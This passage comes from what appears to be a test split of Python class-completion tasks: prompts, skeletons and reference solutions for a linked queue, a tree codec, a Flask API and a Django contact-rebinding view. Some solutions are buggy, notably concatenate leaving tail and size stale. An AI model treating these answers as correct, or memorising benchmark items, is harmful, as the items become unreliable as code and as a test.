empty exception if the queue is empty :return:\n- def enqueue(self, element): add an element to the back of queue :param element: :return:\n- def rotate(self): rotate front element to the back of the queue :return:\n- def concatenate(self, Q): takes all elements of LinkedQueue Q2 and appends them to the end of the original queue. run in O(1) result in Q being an empty queue :param Q: :return:", "prompted_full_text": "Implement the Python class `LinkedQueue` described below.\n\nClass description:\nFIFO (first in first out) queue implementation using a singly linked list for storage enqueue elements at the back and dequeue them from the front\n\nMethod signatures and docstrings:\n- def first(self): return __but do not remove__ the element at the front of the queue :return:\n- def dequeue(self): remove and return the first element of the queue FIFO (first in first out) raise empty exception if the queue is empty :return:\n- def enqueue(self, element): add an element to the back of queue :param element: :return:\n- def rotate(self): rotate front element to the back of the queue :return:\n- def concatenate(self, Q): takes all elements of LinkedQueue Q2 and appends them to the end of the original queue. run in O(1) result in Q being an empty queue :param Q: :return:\n\n<|skeleton|>\nclass LinkedQueue:\n \"\"\"FIFO (first in first out) queue implementation using a singly linked list for storage enqueue elements at the back and dequeue them from the front\"\"\"\n\n def first(self):\n \"\"\"return __but do not remove__ the element at the front of the queue :return:\"\"\"\n <|body_0|>\n\n def dequeue(self):\n \"\"\"remove and return the first element of the queue FIFO (first in first out) raise empty exception if the queue is empty :return:\"\"\"\n <|body_1|>\n\n def enqueue(self, element):\n \"\"\"add an element to the back of queue :param element: :return:\"\"\"\n <|body_2|>\n\n def rotate(self):\n \"\"\"rotate front element to the back of the queue :return:\"\"\"\n <|body_3|>\n\n def concatenate(self, Q):\n \"\"\"takes all elements of LinkedQueue Q2 and appends them to the end of the original queue. run in O(1) result in Q being an empty queue :param Q: :return:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if self.is_empty():\n raise Empty('Queue is empty')\n return self._head._element\n<|end_body_0|>\n\n<|body_start_1|>\n if self.is_empty():\n raise Empty('Queue is empty')\n answer = self._head._element\n self._head = self._head._next\n self._size -= 1\n if self.is_empty():\n self._tail = None\n return answer\n<|end_body_1|>\n\n<|body_start_2|>\n newest = self._Node(element, None)\n if self.is_empty():\n self._head = newest\n else:\n self._tail._next = newest\n self._tail = newest\n self._size += 1\n<|end_body_2|>\n\n<|body_start_3|>\n if not self.is_empty():\n head = self._head\n self._head = head._next\n head._next = None\n self._tail._next = head\n self._tail = head\n<|end_body_3|>\n\n<|body_start_4|>\n assert isinstance(Q, LinkedQueue)\n if self.is_empty():\n self._head = Q._head\n else:\n self._tail._next = Q._head\n Q._head = None\n<|end_body_4|>\n", "revision_id": "f79b08021cebbfe0ff32abcc8e9dd56af32e4aad", "skeleton": "<|skeleton|>\nclass LinkedQueue:\n \"\"\"FIFO (first in first out) queue implementation using a singly linked list for storage enqueue elements at the back and dequeue them from the front\"\"\"\n\n def first(self):\n \"\"\"return __but do not remove__ the element at the front of the queue :return:\"\"\"\n <|body_0|>\n\n def dequeue(self):\n \"\"\"remove and return the first element of the queue FIFO (first in first out) raise empty exception if the queue is empty :return:\"\"\"\n <|body_1|>\n\n def enqueue(self, element):\n \"\"\"add an element to the back of queue :param element: :return:\"\"\"\n <|body_2|>\n\n def rotate(self):\n \"\"\"rotate front element to the back of the queue :return:\"\"\"\n <|body_3|>\n\n def concatenate(self, Q):\n \"\"\"takes all elements of LinkedQueue Q2 and appends them to the end of the original queue. run in O(1) result in Q being an empty queue :param Q: :return:\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class LinkedQueue:\n \"\"\"FIFO (first in first out) queue implementation using a singly linked list for storage enqueue elements at the back and dequeue them from the front\"\"\"\n\n def first(self):\n \"\"\"return __but do not remove__ the element at the front of the queue :return:\"\"\"\n if self.is_empty():\n raise Empty('Queue is empty')\n return self._head._element\n\n def dequeue(self):\n \"\"\"remove and return the first element of the queue FIFO (first in first out) raise empty exception if the queue is empty :return:\"\"\"\n if self.is_empty():\n raise Empty('Queue is empty')\n answer = self._head._element\n self._head = self._head._next\n self._size -= 1\n if self.is_empty():\n self._tail = None\n return answer\n\n def enqueue(self, element):\n \"\"\"add an element to the back of queue :param element: :return:\"\"\"\n newest = self._Node(element, None)\n if self.is_empty():\n self._head = newest\n else:\n self._tail._next = newest\n self._tail = newest\n self._size += 1\n\n def rotate(self):\n \"\"\"rotate front element to the back of the queue :return:\"\"\"\n if not self.is_empty():\n head = self._head\n self._head = head._next\n head._next = None\n self._tail._next = head\n self._tail = head\n\n def concatenate(self, Q):\n \"\"\"takes all elements of LinkedQueue Q2 and appends them to the end of the original queue. run in O(1) result in Q being an empty queue :param Q: :return:\"\"\"\n assert isinstance(Q, LinkedQueue)\n if self.is_empty():\n self._head = Q._head\n else:\n self._tail._next = Q._head\n Q._head = None\n", "source": "the_stack_v2_python_sparse", "source_path": "exercises/ch08_trees/LinkedQueue.py", "source_repo": "rarezhang/data_structures_and_algorithms_in_python", "split": "test", "star_events_count": 0} {"blob_id": "4b21f623501ef2b4eae6d072f9bf3119a3e067f1", "bodies": ["res = []\nif not root:\n return []\nq = collections.deque([root])\nwhile q:\n for _ in range(len(q)):\n node = q.popleft()\n if node:\n res.append(str(node.val))\n q.append(node.left)\n q.append(node.right)\n else:\n res.append('null')\nreturn ','.join(res)", "if not data:\n return None\ndata = data.split(',')\nif not data:\n return ''\ni = 0\nroot = TreeNode(int(data[i]))\nq = collections.deque([root])\nwhile q:\n if i >= len(data) - 1:\n return root\n node = q.popleft()\n i += 1\n if data[i] != 'null':\n node.left = TreeNode(int(data[i]))\n q.append(node.left)\n i += 1\n if data[i] != 'null':\n node.right = TreeNode(int(data[i]))\n q.append(node.right)\nreturn root"], "bodies_text": "<|body_start_0|>\n res = []\n if not root:\n return []\n q = collections.deque([root])\n while q:\n for _ in range(len(q)):\n node = q.popleft()\n if node:\n res.append(str(node.val))\n q.append(node.left)\n q.append(node.right)\n else:\n res.append('null')\n return ','.join(res)\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return None\n data = data.split(',')\n if not data:\n return ''\n i = 0\n root = TreeNode(int(data[i]))\n q = collections.deque([root])\n while q:\n if i >= len(data) - 1:\n return root\n node = q.popleft()\n i += 1\n if data[i] != 'null':\n node.left = TreeNode(int(data[i]))\n q.append(node.left)\n i += 1\n if data[i] != 'null':\n node.right = TreeNode(int(data[i]))\n q.append(node.right)\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = []\n if not root:\n return []\n q = collections.deque([root])\n while q:\n for _ in range(len(q)):\n node = q.popleft()\n if node:\n res.append(str(node.val))\n q.append(node.left)\n q.append(node.right)\n else:\n res.append('null')\n return ','.join(res)\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return None\n data = data.split(',')\n if not data:\n return ''\n i = 0\n root = TreeNode(int(data[i]))\n q = collections.deque([root])\n while q:\n if i >= len(data) - 1:\n return root\n node = q.popleft()\n i += 1\n if data[i] != 'null':\n node.left = TreeNode(int(data[i]))\n q.append(node.left)\n i += 1\n if data[i] != 'null':\n node.right = TreeNode(int(data[i]))\n q.append(node.right)\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000130", "length_bytes": 3153, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: TreeNode :rtype: str", "name": "serialize", "signature": "def serialize(self, root)"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "name": "deserialize", "signature": "def deserialize(self, data)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006077", "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root): Encodes a tree to a single string. :type root: TreeNode :rtype: str\n- def deserialize(self, data): Decodes your encoded data to tree. :type data: str :rtype: TreeNode\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n res = []\n if not root:\n return []\n q = collections.deque([root])\n while q:\n for _ in range(len(q)):\n node = q.popleft()\n if node:\n res.append(str(node.val))\n q.append(node.left)\n q.append(node.right)\n else:\n res.append('null')\n return ','.join(res)\n<|end_body_0|>\n\n<|body_start_1|>\n if not data:\n return None\n data = data.split(',')\n if not data:\n return ''\n i = 0\n root = TreeNode(int(data[i]))\n q = collections.deque([root])\n while q:\n if i >= len(data) - 1:\n return root\n node = q.popleft()\n i += 1\n if data[i] != 'null':\n node.left = TreeNode(int(data[i]))\n q.append(node.left)\n i += 1\n if data[i] != 'null':\n node.right = TreeNode(int(data[i]))\n q.append(node.right)\n return root\n<|end_body_1|>\n", "revision_id": "fc1b0bec0e28d31e9a6ff722b3a66eacb0278148", "skeleton": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Codec:\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string. :type root: TreeNode :rtype: str\"\"\"\n res = []\n if not root:\n return []\n q = collections.deque([root])\n while q:\n for _ in range(len(q)):\n node = q.popleft()\n if node:\n res.append(str(node.val))\n q.append(node.left)\n q.append(node.right)\n else:\n res.append('null')\n return ','.join(res)\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: TreeNode\"\"\"\n if not data:\n return None\n data = data.split(',')\n if not data:\n return ''\n i = 0\n root = TreeNode(int(data[i]))\n q = collections.deque([root])\n while q:\n if i >= len(data) - 1:\n return root\n node = q.popleft()\n i += 1\n if data[i] != 'null':\n node.left = TreeNode(int(data[i]))\n q.append(node.left)\n i += 1\n if data[i] != 'null':\n node.right = TreeNode(int(data[i]))\n q.append(node.right)\n return root\n", "source": "the_stack_v2_python_sparse", "source_path": "树/297二叉树的序列化与反序列化.py", "source_repo": "LeopoldACC/Algorithm", "split": "test", "star_events_count": 2} {"blob_id": "766430e6d7e04403ec26164a43921eafdef2428f", "bodies": ["st = Study.query.get(kf_id)\nif st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\nreturn StudySchema().jsonify(st)", "body = request.get_json(force=True)\nst = Study.query.get(kf_id)\nif st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\ntry:\n st = StudySchema(strict=True).load(body, instance=st, partial=True).data\nexcept ValidationError as err:\n abort(400, 'could not update study: {}'.format(err.messages))\ndb.session.add(st)\ndb.session.commit()\nreturn (StudySchema(200, 'study {} updated'.format(st.kf_id)).jsonify(st), 200)", "st = Study.query.get(kf_id)\nif st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\ndb.session.delete(st)\ndb.session.commit()\nreturn (StudySchema(200, 'study {} deleted'.format(st.kf_id)).jsonify(st), 200)"], "bodies_text": "<|body_start_0|>\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n return StudySchema().jsonify(st)\n<|end_body_0|>\n\n<|body_start_1|>\n body = request.get_json(force=True)\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n try:\n st = StudySchema(strict=True).load(body, instance=st, partial=True).data\n except ValidationError as err:\n abort(400, 'could not update study: {}'.format(err.messages))\n db.session.add(st)\n db.session.commit()\n return (StudySchema(200, 'study {} updated'.format(st.kf_id)).jsonify(st), 200)\n<|end_body_1|>\n\n<|body_start_2|>\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n db.session.delete(st)\n db.session.commit()\n return (StudySchema(200, 'study {} deleted'.format(st.kf_id)).jsonify(st), 200)\n<|end_body_2|>\n", "class_docstring": "Study API", "class_name": "StudyAPI", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass StudyAPI:\n \"\"\"Study API\"\"\"\n\n def get(self, kf_id):\n \"\"\"Get a study by id --- template: path: get_by_id.yml properties: resource: Study\"\"\"\n <|body_0|>\n\n def patch(self, kf_id):\n \"\"\"Update an existing study. Allows partial update of resource --- template: path: update_by_id.yml properties: resource: Study\"\"\"\n <|body_1|>\n\n def delete(self, kf_id):\n \"\"\"Delete study by id --- template: path: delete_by_id.yml properties: resource: Study\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n return StudySchema().jsonify(st)\n<|end_body_0|>\n\n<|body_start_1|>\n body = request.get_json(force=True)\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n try:\n st = StudySchema(strict=True).load(body, instance=st, partial=True).data\n except ValidationError as err:\n abort(400, 'could not update study: {}'.format(err.messages))\n db.session.add(st)\n db.session.commit()\n return (StudySchema(200, 'study {} updated'.format(st.kf_id)).jsonify(st), 200)\n<|end_body_1|>\n\n<|body_start_2|>\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n db.session.delete(st)\n db.session.commit()\n return (StudySchema(200, 'study {} deleted'.format(st.kf_id)).jsonify(st), 200)\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000131", "length_bytes": 3738, "license_type": "permissive", "methods": [{"docstring": "Get a study by id --- template: path: get_by_id.yml properties: resource: Study", "name": "get", "signature": "def get(self, kf_id)"}, {"docstring": "Update an existing study. Allows partial update of resource --- template: path: update_by_id.yml properties: resource: Study", "name": "patch", "signature": "def patch(self, kf_id)"}, {"docstring": "Delete study by id --- template: path: delete_by_id.yml properties: resource: Study", "name": "delete", "signature": "def delete(self, kf_id)"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_007371", "prompt": "Implement the Python class `StudyAPI` described below.\n\nClass description:\nStudy API\n\nMethod signatures and docstrings:\n- def get(self, kf_id): Get a study by id --- template: path: get_by_id.yml properties: resource: Study\n- def patch(self, kf_id): Update an existing study. Allows partial update of resource --- template: path: update_by_id.yml properties: resource: Study\n- def delete(self, kf_id): Delete study by id --- template: path: delete_by_id.yml properties: resource: Study", "prompted_full_text": "Implement the Python class `StudyAPI` described below.\n\nClass description:\nStudy API\n\nMethod signatures and docstrings:\n- def get(self, kf_id): Get a study by id --- template: path: get_by_id.yml properties: resource: Study\n- def patch(self, kf_id): Update an existing study. Allows partial update of resource --- template: path: update_by_id.yml properties: resource: Study\n- def delete(self, kf_id): Delete study by id --- template: path: delete_by_id.yml properties: resource: Study\n\n<|skeleton|>\nclass StudyAPI:\n \"\"\"Study API\"\"\"\n\n def get(self, kf_id):\n \"\"\"Get a study by id --- template: path: get_by_id.yml properties: resource: Study\"\"\"\n <|body_0|>\n\n def patch(self, kf_id):\n \"\"\"Update an existing study. Allows partial update of resource --- template: path: update_by_id.yml properties: resource: Study\"\"\"\n <|body_1|>\n\n def delete(self, kf_id):\n \"\"\"Delete study by id --- template: path: delete_by_id.yml properties: resource: Study\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n return StudySchema().jsonify(st)\n<|end_body_0|>\n\n<|body_start_1|>\n body = request.get_json(force=True)\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n try:\n st = StudySchema(strict=True).load(body, instance=st, partial=True).data\n except ValidationError as err:\n abort(400, 'could not update study: {}'.format(err.messages))\n db.session.add(st)\n db.session.commit()\n return (StudySchema(200, 'study {} updated'.format(st.kf_id)).jsonify(st), 200)\n<|end_body_1|>\n\n<|body_start_2|>\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n db.session.delete(st)\n db.session.commit()\n return (StudySchema(200, 'study {} deleted'.format(st.kf_id)).jsonify(st), 200)\n<|end_body_2|>\n", "revision_id": "36ee3fc3d1ba9d1a177274d051fb175c56dd898e", "skeleton": "<|skeleton|>\nclass StudyAPI:\n \"\"\"Study API\"\"\"\n\n def get(self, kf_id):\n \"\"\"Get a study by id --- template: path: get_by_id.yml properties: resource: Study\"\"\"\n <|body_0|>\n\n def patch(self, kf_id):\n \"\"\"Update an existing study. Allows partial update of resource --- template: path: update_by_id.yml properties: resource: Study\"\"\"\n <|body_1|>\n\n def delete(self, kf_id):\n \"\"\"Delete study by id --- template: path: delete_by_id.yml properties: resource: Study\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class StudyAPI:\n \"\"\"Study API\"\"\"\n\n def get(self, kf_id):\n \"\"\"Get a study by id --- template: path: get_by_id.yml properties: resource: Study\"\"\"\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n return StudySchema().jsonify(st)\n\n def patch(self, kf_id):\n \"\"\"Update an existing study. Allows partial update of resource --- template: path: update_by_id.yml properties: resource: Study\"\"\"\n body = request.get_json(force=True)\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n try:\n st = StudySchema(strict=True).load(body, instance=st, partial=True).data\n except ValidationError as err:\n abort(400, 'could not update study: {}'.format(err.messages))\n db.session.add(st)\n db.session.commit()\n return (StudySchema(200, 'study {} updated'.format(st.kf_id)).jsonify(st), 200)\n\n def delete(self, kf_id):\n \"\"\"Delete study by id --- template: path: delete_by_id.yml properties: resource: Study\"\"\"\n st = Study.query.get(kf_id)\n if st is None:\n abort(404, 'could not find {} `{}`'.format('study', kf_id))\n db.session.delete(st)\n db.session.commit()\n return (StudySchema(200, 'study {} deleted'.format(st.kf_id)).jsonify(st), 200)\n", "source": "the_stack_v2_python_sparse", "source_path": "dataservice/api/study/resources.py", "source_repo": "kids-first/kf-api-dataservice", "split": "test", "star_events_count": 9} {"blob_id": "d97de1797a8f6fd2c8d495aa144edbf2e8c1a33a", "bodies": ["is_existed = validated_data['is_existed']\ncode = validated_data['code']\nnew_phone = validated_data['phone']\nif is_existed:\n old_phone = validated_data['old_phone']\n is_success = cache.check_code(old_phone, code)\nelse:\n is_success = cache.check_code(new_phone, code)\nif is_success:\n instance.phone = new_phone\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\nreturn False", "is_existed = validated_data['is_existed']\ncode = validated_data['code']\nnew_email = validated_data['email']\nif is_existed:\n old_email = validated_data['old_email']\n is_success = cache.check_code(old_email, code)\nelse:\n is_success = cache.check_code(new_email, code)\nif is_success:\n instance.email = new_email\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\nreturn False", "func_list = {'email': 'bind_email', 'phone': 'bind_phone'}\nfunc = func_list.get(way)\nbind = getattr(self, func)\nreturn bind(self.redis, instance, validated_data)", "serializer = self.get_serializer(data=request.data)\nserializer.is_valid(raise_exception=True)\nway = serializer.validated_data.get('way')\nbind_success = self.factory(way, serializer.validated_data, request.user)\nif bind_success:\n return Response(response_code.bind_success, status=status.HTTP_200_OK)\nreturn Response(response_code.bind_error, status=status.HTTP_500_INTERNAL_SERVER_ERROR)"], "bodies_text": "<|body_start_0|>\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_phone = validated_data['phone']\n if is_existed:\n old_phone = validated_data['old_phone']\n is_success = cache.check_code(old_phone, code)\n else:\n is_success = cache.check_code(new_phone, code)\n if is_success:\n instance.phone = new_phone\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_email = validated_data['email']\n if is_existed:\n old_email = validated_data['old_email']\n is_success = cache.check_code(old_email, code)\n else:\n is_success = cache.check_code(new_email, code)\n if is_success:\n instance.email = new_email\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n func_list = {'email': 'bind_email', 'phone': 'bind_phone'}\n func = func_list.get(way)\n bind = getattr(self, func)\n return bind(self.redis, instance, validated_data)\n<|end_body_2|>\n\n<|body_start_3|>\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n way = serializer.validated_data.get('way')\n bind_success = self.factory(way, serializer.validated_data, request.user)\n if bind_success:\n return Response(response_code.bind_success, status=status.HTTP_200_OK)\n return Response(response_code.bind_error, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n<|end_body_3|>\n", "class_docstring": "绑定(改绑)用户邮箱或者手机号 需发送验证码验证", "class_name": "BindEmailOrPhone", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass BindEmailOrPhone:\n \"\"\"绑定(改绑)用户邮箱或者手机号 需发送验证码验证\"\"\"\n\n def bind_phone(cache, instance, validated_data):\n \"\"\"改绑手机号\"\"\"\n <|body_0|>\n\n def bind_email(cache, instance, validated_data):\n \"\"\"改绑邮箱\"\"\"\n <|body_1|>\n\n def factory(self, way, validated_data, instance):\n \"\"\"简单工厂管理手机号和邮箱的改绑\"\"\"\n <|body_2|>\n\n def put(self, request):\n \"\"\"改绑OR绑定用户的手机或者邮箱\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_phone = validated_data['phone']\n if is_existed:\n old_phone = validated_data['old_phone']\n is_success = cache.check_code(old_phone, code)\n else:\n is_success = cache.check_code(new_phone, code)\n if is_success:\n instance.phone = new_phone\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_email = validated_data['email']\n if is_existed:\n old_email = validated_data['old_email']\n is_success = cache.check_code(old_email, code)\n else:\n is_success = cache.check_code(new_email, code)\n if is_success:\n instance.email = new_email\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n func_list = {'email': 'bind_email', 'phone': 'bind_phone'}\n func = func_list.get(way)\n bind = getattr(self, func)\n return bind(self.redis, instance, validated_data)\n<|end_body_2|>\n\n<|body_start_3|>\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n way = serializer.validated_data.get('way')\n bind_success = self.factory(way, serializer.validated_data, request.user)\n if bind_success:\n return Response(response_code.bind_success, status=status.HTTP_200_OK)\n return Response(response_code.bind_error, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000132", "length_bytes": 28563, "license_type": "permissive", "methods": [{"docstring": "改绑手机号", "name": "bind_phone", "signature": "def bind_phone(cache, instance, validated_data)"}, {"docstring": "改绑邮箱", "name": "bind_email", "signature": "def bind_email(cache, instance, validated_data)"}, {"docstring": "简单工厂管理手机号和邮箱的改绑", "name": "factory", "signature": "def factory(self, way, validated_data, instance)"}, {"docstring": "改绑OR绑定用户的手机或者邮箱", "name": "put", "signature": "def put(self, request)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_002513", "prompt": "Implement the Python class `BindEmailOrPhone` described below.\n\nClass description:\n绑定(改绑)用户邮箱或者手机号 需发送验证码验证\n\nMethod signatures and docstrings:\n- def bind_phone(cache, instance, validated_data): 改绑手机号\n- def bind_email(cache, instance, validated_data): 改绑邮箱\n- def factory(self, way, validated_data, instance): 简单工厂管理手机号和邮箱的改绑\n- def put(self, request): 改绑OR绑定用户的手机或者邮箱", "prompted_full_text": "Implement the Python class `BindEmailOrPhone` described below.\n\nClass description:\n绑定(改绑)用户邮箱或者手机号 需发送验证码验证\n\nMethod signatures and docstrings:\n- def bind_phone(cache, instance, validated_data): 改绑手机号\n- def bind_email(cache, instance, validated_data): 改绑邮箱\n- def factory(self, way, validated_data, instance): 简单工厂管理手机号和邮箱的改绑\n- def put(self, request): 改绑OR绑定用户的手机或者邮箱\n\n<|skeleton|>\nclass BindEmailOrPhone:\n \"\"\"绑定(改绑)用户邮箱或者手机号 需发送验证码验证\"\"\"\n\n def bind_phone(cache, instance, validated_data):\n \"\"\"改绑手机号\"\"\"\n <|body_0|>\n\n def bind_email(cache, instance, validated_data):\n \"\"\"改绑邮箱\"\"\"\n <|body_1|>\n\n def factory(self, way, validated_data, instance):\n \"\"\"简单工厂管理手机号和邮箱的改绑\"\"\"\n <|body_2|>\n\n def put(self, request):\n \"\"\"改绑OR绑定用户的手机或者邮箱\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_phone = validated_data['phone']\n if is_existed:\n old_phone = validated_data['old_phone']\n is_success = cache.check_code(old_phone, code)\n else:\n is_success = cache.check_code(new_phone, code)\n if is_success:\n instance.phone = new_phone\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\n return False\n<|end_body_0|>\n\n<|body_start_1|>\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_email = validated_data['email']\n if is_existed:\n old_email = validated_data['old_email']\n is_success = cache.check_code(old_email, code)\n else:\n is_success = cache.check_code(new_email, code)\n if is_success:\n instance.email = new_email\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\n return False\n<|end_body_1|>\n\n<|body_start_2|>\n func_list = {'email': 'bind_email', 'phone': 'bind_phone'}\n func = func_list.get(way)\n bind = getattr(self, func)\n return bind(self.redis, instance, validated_data)\n<|end_body_2|>\n\n<|body_start_3|>\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n way = serializer.validated_data.get('way')\n bind_success = self.factory(way, serializer.validated_data, request.user)\n if bind_success:\n return Response(response_code.bind_success, status=status.HTTP_200_OK)\n return Response(response_code.bind_error, status=status.HTTP_500_INTERNAL_SERVER_ERROR)\n<|end_body_3|>\n", "revision_id": "13cb59130d15e782f78bc5148409bef0f1c516e0", "skeleton": "<|skeleton|>\nclass BindEmailOrPhone:\n \"\"\"绑定(改绑)用户邮箱或者手机号 需发送验证码验证\"\"\"\n\n def bind_phone(cache, instance, validated_data):\n \"\"\"改绑手机号\"\"\"\n <|body_0|>\n\n def bind_email(cache, instance, validated_data):\n \"\"\"改绑邮箱\"\"\"\n <|body_1|>\n\n def factory(self, way, validated_data, instance):\n \"\"\"简单工厂管理手机号和邮箱的改绑\"\"\"\n <|body_2|>\n\n def put(self, request):\n \"\"\"改绑OR绑定用户的手机或者邮箱\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BindEmailOrPhone:\n \"\"\"绑定(改绑)用户邮箱或者手机号 需发送验证码验证\"\"\"\n\n def bind_phone(cache, instance, validated_data):\n \"\"\"改绑手机号\"\"\"\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_phone = validated_data['phone']\n if is_existed:\n old_phone = validated_data['old_phone']\n is_success = cache.check_code(old_phone, code)\n else:\n is_success = cache.check_code(new_phone, code)\n if is_success:\n instance.phone = new_phone\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\n return False\n\n def bind_email(cache, instance, validated_data):\n \"\"\"改绑邮箱\"\"\"\n is_existed = validated_data['is_existed']\n code = validated_data['code']\n new_email = validated_data['email']\n if is_existed:\n old_email = validated_data['old_email']\n is_success = cache.check_code(old_email, code)\n else:\n is_success = cache.check_code(new_email, code)\n if is_success:\n instance.email = new_email\n try:\n instance.save()\n except Exception as e:\n consumer_logger.error(e)\n return False\n else:\n return True\n return False\n\n def factory(self, way, validated_data, instance):\n \"\"\"简单工厂管理手机号和邮箱的改绑\"\"\"\n func_list = {'email': 'bind_email', 'phone': 'bind_phone'}\n func = func_list.get(way)\n bind = getattr(self, func)\n return bind(self.redis, instance, validated_data)\n\n def put(self, request):\n \"\"\"改绑OR绑定用户的手机或者邮箱\"\"\"\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n way = serializer.validated_data.get('way')\n bind_success = self.factory(way, serializer.validated_data, request.user)\n if bind_success:\n return Response(response_code.bind_success, status=status.HTTP_200_OK)\n return 